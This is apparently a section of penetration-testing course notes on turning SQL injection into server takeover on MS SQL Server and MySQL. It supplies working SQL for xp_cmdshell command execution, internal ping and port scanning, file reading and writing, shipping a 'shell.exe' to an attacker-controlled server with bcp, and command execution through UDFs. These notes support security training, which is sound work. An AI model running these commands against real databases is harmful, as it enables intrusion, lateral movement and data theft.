2.4.8 From SQLi to Server Takeover
From SQLi to Server Takeover
In this section, advanced features provided by MS SQL Server and MySQL are explored, revealing how these features can be exploited to gain access to the DBMS server machine.
Advanced SQL Server Exploitation
xp_cmdshell:
xp_cmdshell
is a stored procedure in SQL Server that provides advanced features.To run an OS command:
EXEC master..xp_cmdshell '<command>'
Not enabled by default, requires sa privileges.
Enable and disable:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- After tests EXEC sp_configure 'xp_cmdshell', 0; EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
Internal Network Host Enumeration
Use
xp_cmdshell
to launch commands.Ping command:
EXEC master.dbo.xp_cmdshell 'ping <target IP address>'
Use execution time to infer ping result.
Port Scanning (OPENROWSET)
Use
OPENROWSET
for remote server table access.Exploit for port scanning:
SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sas;pwd=something;Network=DBMSSOCN;Address=<target IP>,<target port>;timeout=<connection timeout in seconds>', 'select 1')--
Detect open/closed ports based on error messages.
Reading the File System
Use
EXEC master..xp_cmdshell 'dir <target directory>'
to list directory contents.Save output to a web-accessible folder or read a file and put content into a table for extraction.
Uploading Files
Insert file into a table in the MS SQL database.
CREATE TABLE HelperTable (file text) BULK INSERT HelperTable FROM 'shell.exe' WITH (codepage='RAW')
Retrieve it from our server:
EXEC xp_cmdshell 'bcp "SELECT * FROM HelperTable" queryout shell.exe -c -Craw -S<our server address> -I<out server username> -P<our server password>'
Storing Command Results into a Temporary Table
Create a temporary table to hold stored procedure output:
CREATE TABLE temptable (id int not null identity (1,1), output nvarchar(4096) null);
Craft argument for
xp_cmdshell
.Execute command and store results:
declare @t nvarchar(4096) set @t=0x640069007200200063003a005c00 insert into temptable (output) EXEC master.dbo.xp_cmdshell @t;
Conclusion:
Advanced SQL Server exploitation involves leveraging features like
xp_cmdshell
for OS command execution, internal network host enumeration, port scanning, reading the file system, uploading and downloading files, and storing command results for further analysis.
Advanced MySQL Exploitation
Reading the File System:
Use
LOAD_FILE('<text file path>')
to read files.For binary files:
SELECT HEX(LOAD_FILE('<text file path>'))
.
Uploading Files:
Use
SELECT ... INTO DUMPFILE
to write query results to a file.SELECT <fields> FROM <table> INTO DUMPFILE '<output file path>';
Convert binary file to hex-string and upload.
Executing Shell Commands:
MySQL doesn't provide a direct method for running shell commands.
Use User Defined Functions (UDF) for custom functions like
sys_eval
andsys_exec
.Upload shared objects (SO) or dynamic-link library (DLL) files to the target server.
Execute commands:
SELECT sys_eval('<command>') SELECT sys_exec('<command>')
Conclusion:
Advanced MySQL exploitation includes reading the file system, uploading files, and executing shell commands using User Defined Functions (UDFs).